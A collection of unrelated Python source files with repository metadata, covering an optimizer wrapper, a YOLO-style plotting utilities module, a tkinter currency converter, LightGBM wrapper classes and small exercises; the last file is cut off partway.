sol_inform['text'] = self.getInform(iterm[0])
if store_sol:
sol_name = 'PSQP Solution to ' + opt_problem.name
sol_options = copy.copy(self.options)
if sol_options.has_key('defaults'):
del sol_options['defaults']
#end
sol_evals = psqp.stat.nfv + psqp.stat.nfg*nvar
sol_vars = copy.deepcopy(opt_problem._variables)
i = 0
for key in sol_vars.keys():
sol_vars[key].value = xx[i]
i += 1
#end
sol_objs = copy.deepcopy(opt_problem._objectives)
i = 0
for key in sol_objs.keys():
sol_objs[key].value = ff[i]
i += 1
#end
if ncon > 0:
sol_cons = copy.deepcopy(opt_problem._constraints)
i = 0
for key in sol_cons.keys():
sol_cons[key].value = gg[i]
i += 1
#end
else:
sol_cons = {}
#end
sol_lambda = {}
opt_problem.addSol(self.__class__.__name__, sol_name, objfunc, sol_time,
sol_evals, sol_inform, sol_vars, sol_objs, sol_cons, sol_options,
display_opts=disp_opts, Lambda=sol_lambda, Sensitivities=sens_type,
myrank=myrank, arguments=args, **kwargs)
#end
return ff, xx, sol_inform
def _on_setOption(self, name, value):
'''
Set Optimizer Option Value (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
pass
def _on_getOption(self, name):
'''
Get Optimizer Option Value (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
pass
def _on_getInform(self, infocode):
'''
Get Optimizer Result Information (Optimizer Specific Routine)
Keyword arguments:
-----------------
id -> STRING: Option Name
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
return self.informs[infocode]
def _on_flushFiles(self):
'''
Flush the Output Files (Optimizer Specific Routine)
Documentation last updated: November. 30, 2010 - Ruben E. Perez
'''
#
iprint = self.options['IPRINT'][1]
if (iprint > 0):
psqp.pyflush(self.options['IOUT'][1])
#end
#==============================================================================
# PSQP Optimizer Test
#==============================================================================
if __name__ == '__main__':
# Test PSQP
print 'Testing ...'
psqp = PSQP()
print psqp
| 26.837359
| 165
| 0.552742
|
dd99016ceb11b93851eaa940b462910c5f9ab5eb
| 398
|
py
|
Python
|
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
exercs/ex104.py
|
gugamacedo/logica-e-algoritmos
|
787e771cf9ecebe876ac895fd0b544476d8e3b15
|
[
"MIT"
] | null | null | null |
# faça a função leia_int() que funcionará como um input, mas que só aceita Int
def leia_int(texto):
while True:
num = str(input((texto))).replace(' ', '')
if num.isnumeric():
num = int(num)
return num
else:
print('\033[31mErro!\033[m')
num = leia_int('Digite um número inteiro: ')
print(f'O número inserido foi {num}')
| 28.428571
| 79
| 0.557789
|
99474f4fc8fc3df199b558b4045309b09c684b8a
| 1,587
|
py
|
Python
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 14
|
2021-10-01T16:53:27.000Z
|
2021-10-17T13:15:44.000Z
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 37
|
2021-10-01T17:14:52.000Z
|
2021-10-21T17:26:14.000Z
|
Python/currency_convertor.py
|
TheDesTrucToRR/Hacktoberfest-2021
|
2757383c7432909dfbdbda61fb9ca9f6de495cfe
|
[
"MIT"
] | 38
|
2021-10-01T16:59:16.000Z
|
2021-10-30T16:05:31.000Z
|
#Currency Convertor
import tkinter as tk
import tkinter.ttk as ttk
from forex_python.converter import CurrencyRates
def convertcurr(rate):
x = amount.get()
y = currency_from.get()
z = currency_to.get()
curr = CurrencyRates()
f = curr.convert(y,z,x)
final.set(format(f, '.2f'))
root = tk.Tk()
root.geometry('450x400')
root.title('Currency Converter')
amount = tk.IntVar()
currency_from = tk.StringVar()
currency_to = tk.StringVar()
final = tk.StringVar()
tk.Label(root, text='Input amount',font='Times').grid(row=0, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=amount)
q.grid(row=1, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
tk.Label(root, text='Input Convert From (USD,INR,EUR,GBP etc)',font='Times').grid(row=2, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=currency_from)
q.grid(row=3, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
tk.Label(root, text='Input Convert To (USD,INR,EUR,GBP etc)',font='Times').grid(row=4, column=0, columnspan=5,sticky='NSEW')
q = ttk.Entry(root, textvariable=currency_to)
q.grid(row=5, column=1, columnspan=3, sticky='NSWE', padx=5, pady=5)
w = ttk.Button(root, text='Convert', command=lambda r=1.08: convertcurr(r))
w.grid(row=7, column=2, padx=5, pady=5,sticky='NSWE')
tk.Label(root).grid(row=9, column=0, columnspan=5)
tk.Label(root, text='--Converted Amount--',font='Times').grid(row=10, column=1, columnspan=3, sticky='NSWE')
l = ttk.Label(root, textvariable=final, relief='groove')
l.grid(row=11, column=1, columnspan=3, sticky='NSWE')
root.mainloop()
| 30.519231
| 126
| 0.711405
|
f3d170a2d7826234f4cbefd70f6ffe1a7fc6b8de
| 60
|
py
|
Python
|
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
retina/model/necks/registry.py
|
mike112223/retina
|
cdad3af8240471619f42e9edd1caf68a0241bea6
|
[
"Apache-2.0"
] | null | null | null |
from retina.utils import Registry
NECKS = Registry('neck')
| 15
| 33
| 0.766667
|
9310d46be375f9502ecca0a5ef5a1da251fad6bc
| 19,078
|
py
|
Python
|
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | 8
|
2022-01-11T14:35:38.000Z
|
2022-03-31T09:47:26.000Z
|
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | null | null | null |
utils/plots.py
|
heieureka/emotic
|
93cd79e30e03c3fd3a4a478dcf645db569fe2a1b
|
[
"MIT"
] | 4
|
2022-01-17T00:51:38.000Z
|
2022-03-30T16:12:28.000Z
|
# Plotting utils
import glob
import math
import os
import random
from copy import copy
from pathlib import Path
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import torch
import yaml
from PIL import Image, ImageDraw, ImageFont
from utils.general import xywh2xyxy, xyxy2xywh
from utils.metrics import fitness
# Settings
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
class Colors:
# Ultralytics color palette https://ultralytics.com/
def __init__(self):
# hex = matplotlib.colors.TABLEAU_COLORS.values()
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h): # rgb order (PIL)
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors() # create instance for 'from utils.plots import colors'
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
from scipy.signal import butter, filtfilt
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
def plot_one_box(x, im, pred_cat, pred_cont, color=(128, 128, 128), label=None, line_thickness=3):
# Plots one bounding box on image 'im' using OpenCV
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to plot_on_box() input image.'
tl = line_thickness or round(0.002 * (im.shape[0] + im.shape[1]) / 2) + 1 # line/font thickness
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(im, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(im, c1, c2, color, -1, cv2.LINE_AA) # filled
#cv2.putText(im, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
for id, text in enumerate(pred_cat):
cv2.putText(im, text, (c1[0], c1[1] + id*20), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def plot_one_box_PIL(box, im, color=(128, 128, 128), label=None, line_thickness=None):
# Plots one bounding box on image 'im' using PIL
im = Image.fromarray(im)
draw = ImageDraw.Draw(im)
line_thickness = line_thickness or max(int(min(im.size) / 200), 2)
draw.rectangle(box, width=line_thickness, outline=color) # plot
if label:
font = ImageFont.truetype("Arial.ttf", size=max(round(max(im.size) / 40), 12))
txt_width, txt_height = font.getsize(label)
draw.rectangle([box[0], box[1] - txt_height + 4, box[0] + txt_width, box[1]], fill=color)
draw.text((box[0], box[1] - txt_height + 1), label, fill=(255, 255, 255), font=font)
return np.asarray(im)
def plot_wh_methods(): # from utils.plots import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), tight_layout=True)
plt.plot(x, ya, '.-', label='YOLOv3')
plt.plot(x, yb ** 2, '.-', label='YOLOv5 ^2')
plt.plot(x, yb ** 1.6, '.-', label='YOLOv5 ^1.6')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.grid()
plt.legend()
fig.savefig('comparison.png', dpi=200)
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, img in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
labels = image_targets.shape[1] == 6 # labels if no conf column
conf = None if labels else image_targets[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1]:
if boxes.max() <= 1.01: # if normalized with tolerance 0.01
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
elif scale_factor < 1: # absolute coords need scale if image scales
boxes *= scale_factor
boxes[[0, 2]] += block_x
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = colors(cls)
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = '%s' % cls if labels else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths:
label = Path(paths[i]).name[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname:
r = min(1280. / max(h, w) / ns, 1.0) # ratio to limit image size
mosaic = cv2.resize(mosaic, (int(ns * w * r), int(ns * h * r)), interpolation=cv2.INTER_AREA)
# cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB)) # cv2 save
Image.fromarray(mosaic).save(fname) # PIL save
return mosaic
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
# Plot LR simulating training for full epochs
optimizer, scheduler = copy(optimizer), copy(scheduler) # do not modify originals
y = []
for _ in range(epochs):
scheduler.step()
y.append(optimizer.param_groups[0]['lr'])
plt.plot(y, '.-', label='LR')
plt.xlabel('epoch')
plt.ylabel('LR')
plt.grid()
plt.xlim(0, epochs)
plt.ylim(0)
plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
plt.close()
def plot_test_txt(): # from utils.plots import *; plot_test()
# Plot test.txt histograms
x = np.loadtxt('test.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.plots import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label='%.3g +/- %.3g' % (x[i].mean(), x[i].std()))
ax[i].legend()
ax[i].set_title(s[i])
plt.savefig('targets.jpg', dpi=200)
def plot_study_txt(path='', x=None): # from utils.plots import *; plot_study_txt()
# Plot study.txt generated by test.py
fig, ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)
# ax = ax.ravel()
fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
# for f in [Path(path) / f'study_coco_{x}.txt' for x in ['yolov5s6', 'yolov5m6', 'yolov5l6', 'yolov5x6']]:
for f in sorted(Path(path).glob('study*.txt')):
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_inference (ms/img)', 't_NMS (ms/img)', 't_total (ms/img)']
# for i in range(7):
# ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
# ax[i].set_title(s[i])
j = y[3].argmax() + 1
ax2.plot(y[6, 1:j], y[3, 1:j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid(alpha=0.2)
ax2.set_yticks(np.arange(20, 60, 5))
ax2.set_xlim(0, 57)
ax2.set_ylim(30, 55)
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
plt.savefig(str(Path(path).name) + '.png', dpi=300)
def plot_labels(labels, names=(), save_dir=Path(''), loggers=None):
# plot dataset labels
print('Plotting labels... ')
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
# seaborn correlogram
sns.pairplot(x, corner=True, diag_kind='auto', kind='hist', diag_kws=dict(bins=50), plot_kws=dict(pmax=0.9))
plt.savefig(save_dir / 'labels_correlogram.jpg', dpi=200)
plt.close()
# matplotlib labels
matplotlib.use('svg') # faster
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
y = ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
# [y[2].patches[i].set_color([x / 255 for x in colors(i)]) for i in range(nc)] # update colors bug #3195
ax[0].set_ylabel('instances')
if 0 < len(names) < 30:
ax[0].set_xticks(range(len(names)))
ax[0].set_xticklabels(names, rotation=90, fontsize=10)
else:
ax[0].set_xlabel('classes')
sns.histplot(x, x='x', y='y', ax=ax[2], bins=50, pmax=0.9)
sns.histplot(x, x='width', y='height', ax=ax[3], bins=50, pmax=0.9)
# rectangles
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors(cls)) # plot
ax[1].imshow(img)
ax[1].axis('off')
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(save_dir / 'labels.jpg', dpi=200)
matplotlib.use('Agg')
plt.close()
# loggers
for k, v in loggers.items() or {}:
if k == 'wandb' and v:
v.log({"Labels": [v.Image(str(x), caption=x.name) for x in save_dir.glob('*labels*.jpg')]}, commit=False)
def plot_evolution(yaml_file='data/hyp.finetune.yaml'): # from utils.plots import *; plot_evolution()
# Plot hyperparameter evolution results in evolve.txt
with open(yaml_file) as f:
hyp = yaml.safe_load(f)
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
# weights = (f - f.min()) ** 2 # for weighted results
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(y, f, c=hist2d(y, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print('%15s: %.3g' % (k, mu))
plt.savefig('evolve.png', dpi=200)
print('\nPlot saved as evolve.png')
def profile_idetection(start=0, stop=0, labels=(), save_dir=''):
# Plot iDetection '*.txt' per-image logs. from utils.plots import *; profile_idetection()
ax = plt.subplots(2, 4, figsize=(12, 6), tight_layout=True)[1].ravel()
s = ['Images', 'Free Storage (GB)', 'RAM Usage (GB)', 'Battery', 'dt_raw (ms)', 'dt_smooth (ms)', 'real-world FPS']
files = list(Path(save_dir).glob('frames*.txt'))
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, ndmin=2).T[:, 90:-30] # clip first and last rows
n = results.shape[1] # number of rows
x = np.arange(start, min(stop, n) if stop else n)
results = results[:, x]
t = (results[0] - results[0].min()) # set t0=0s
results[0] = x
for i, a in enumerate(ax):
if i < len(results):
label = labels[fi] if len(labels) else f.stem.replace('frames_', '')
a.plot(t, results[i], marker='.', label=label, linewidth=1, markersize=5)
a.set_title(s[i])
a.set_xlabel('time (s)')
# if fi == len(files) - 1:
# a.set_ylim(bottom=0)
for side in ['top', 'right']:
a.spines[side].set_visible(False)
else:
a.remove()
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
ax[1].legend()
plt.savefig(Path(save_dir) / 'idetection_profile.png', dpi=200)
def plot_results_overlay(start=0, stop=0): # from utils.plots import *; plot_results_overlay()
# Plot training 'results*.txt', overlaying train and val losses
s = ['train', 'train', 'train', 'Precision', 'mAP@0.5', 'val', 'val', 'val', 'Recall', 'mAP@0.5:0.95'] # legends
t = ['Box', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5), tight_layout=True)
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
ax[i].plot(x, y, marker='.', label=s[j])
# y_smooth = butter_lowpass_filtfilt(y)
# ax[i].plot(x, np.gradient(y_smooth), marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=(), labels=(), save_dir=''):
# Plot training 'results*.txt'. from utils.plots import *; plot_results(save_dir='runs/train/exp')
fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)
ax = ax.ravel()
s = ['Box', 'Objectness', 'Classification', 'Precision', 'Recall',
'val Box', 'val Objectness', 'val Classification', 'mAP@0.5', 'mAP@0.5:0.95']
if bucket:
# files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
files = ['results%g.txt' % x for x in id]
c = ('gsutil cp ' + '%s ' * len(files) + '.') % tuple('gs://%s/results%g.txt' % (bucket, x) for x in id)
os.system(c)
else:
files = list(Path(save_dir).glob('results*.txt'))
assert len(files), 'No results.txt files found in %s, nothing to plot.' % os.path.abspath(save_dir)
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
y[y == 0] = np.nan # don't show zero loss values
# y /= y[0] # normalize
label = labels[fi] if len(labels) else f.stem
ax[i].plot(x, y, marker='.', label=label, linewidth=2, markersize=8)
ax[i].set_title(s[i])
# if i in [5, 6, 7]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print('Warning: Plotting error for %s; %s' % (f, e))
ax[1].legend()
fig.savefig(Path(save_dir) / 'results.png', dpi=200)
| 42.489978
| 121
| 0.575951
|
2f7dcf4c22b4d1c0c7d38301f88b9ef4e705040d
| 4,294
|
py
|
Python
|
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | 3
|
2021-06-15T16:02:38.000Z
|
2021-12-08T06:38:47.000Z
|
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | null | null | null |
python-lib/modellightgbm/dku_lightgbm.py
|
shippeo/dss-plugin-model-lightgbm
|
9c2bf2e010775501d7ff2ffdf25d1b51c01a0187
|
[
"MIT"
] | 1
|
2021-06-15T16:06:02.000Z
|
2021-06-15T16:06:02.000Z
|
from lightgbm import LGBMClassifier, LGBMRegressor
class DkuLGBMClassifier(LGBMClassifier):
def __init__(self, boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=100,
subsample_for_bin=200000, objective=None, class_weight=None, min_split_gain=0.0, min_child_weight=0.001,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=0.0, random_state=None, n_jobs=-1, silent=True, importance_type='split',
early_stopping_rounds=None, early_stopping=None):
self.early_stopping_rounds = early_stopping_rounds
super(DkuLGBMClassifier, self).__init__(boosting_type=boosting_type, num_leaves=num_leaves, max_depth=max_depth, learning_rate=learning_rate, n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin, objective=objective, class_weight=class_weight, min_split_gain=min_split_gain, min_child_weight=min_child_weight,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=reg_lambda, random_state=random_state, n_jobs=n_jobs, silent=silent, importance_type=importance_type)
def fit(self, X, y, sample_weight=None, init_score=None, eval_set=None, eval_names=None, eval_sample_weight=None,
eval_class_weight=None, eval_init_score=None, eval_metric=None, early_stopping_rounds=None, verbose=True,
feature_name='auto', categorical_feature='auto', callbacks=None):
return super(DkuLGBMClassifier, self).fit(X, y, init_score=init_score, eval_set=eval_set or [(X, y)], eval_names=eval_names, eval_sample_weight=eval_sample_weight,
eval_class_weight=eval_class_weight, eval_init_score=eval_init_score, eval_metric=eval_metric, verbose=verbose,
feature_name=feature_name, categorical_feature=categorical_feature, callbacks=callbacks, early_stopping_rounds=self.early_stopping_rounds)
class DkuLGBMRegressor(LGBMRegressor):
def __init__(self, boosting_type='gbdt', num_leaves=31, max_depth=-1, learning_rate=0.1, n_estimators=100,
subsample_for_bin=200000, objective=None, class_weight=None, min_split_gain=0.0, min_child_weight=0.001,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=0.0, random_state=None, n_jobs=-1, silent=True, importance_type='split',
early_stopping_rounds=None, early_stopping=None):
self.early_stopping_rounds = early_stopping_rounds
super(DkuLGBMRegressor, self).__init__(boosting_type=boosting_type, num_leaves=num_leaves, max_depth=max_depth, learning_rate=learning_rate, n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin, objective=objective, class_weight=class_weight, min_split_gain=min_split_gain, min_child_weight=min_child_weight,
min_child_samples=20, subsample=1.0, subsample_freq=0, colsample_bytree=1.0, reg_alpha=0.0,
reg_lambda=reg_lambda, random_state=random_state, n_jobs=n_jobs, silent=silent, importance_type=importance_type)
def fit(self, X, y, sample_weight=None, init_score=None, eval_set=None, eval_names=None, eval_sample_weight=None,
eval_init_score=None, eval_metric=None, early_stopping_rounds=None, verbose=True,
feature_name='auto', categorical_feature='auto', callbacks=None):
return super(DkuLGBMRegressor, self).fit(X, y, init_score=init_score, eval_set=eval_set or [(X, y)], eval_names=eval_names, eval_sample_weight=eval_sample_weight,
eval_init_score=eval_init_score, eval_metric=eval_metric, verbose=verbose,
feature_name=feature_name, categorical_feature=categorical_feature, callbacks=callbacks, early_stopping_rounds=self.early_stopping_rounds)
| 97.590909
| 196
| 0.688402
|
4275b5420be205c170623355f3cad808be1b8f18
| 288
|
py
|
Python
|
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
peal/models/__init__.py
|
leyuanheart/PEAL
|
451863918a2a8c574c7c41ea756ebb16cd7065cb
|
[
"MIT"
] | null | null | null |
from sale.models.box2d_models import DQNNetwork, QuantileNetwork, MultiHeadQNetwork
from sale.models.basic_models import MLPNetwork, WeightNetwork
__all__ = ['DQNNetwork',
'QuantileNetwork',
'MultiHeadQNetwork',
'MLPNetwork',
'WeightNetwork']
| 36
| 83
| 0.697917
|
5c893326fabe635e9c3b22a69254f6c8d32df3ee
| 3,344
|
py
|
Python
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 118
|
2020-11-04T16:48:12.000Z
|
2022-03-28T13:15:37.000Z
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 23
|
2020-10-19T09:01:37.000Z
|
2022-03-25T09:12:31.000Z
|
kapture_localization/utils/pairsfile.py
|
jkabalar/kapture-localization
|
647ef7cfdfbdac37297682baca1bf13608b6d6e8
|
[
"BSD-3-Clause"
] | 29
|
2020-11-25T05:28:32.000Z
|
2022-03-23T07:20:23.000Z
|
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
import kapture_localization.utils.path_to_kapture # noqa: F401
import kapture
from kapture_localization.utils.logging import getLogger
from kapture.io.csv import table_from_file
from collections import OrderedDict
from typing import Dict, List, Tuple
def get_pairs_from_file(pairsfile_path: str,
query_records: kapture.RecordsCamera = None,
map_records: kapture.RecordsCamera = None,) -> List[Tuple[str, str]]:
"""
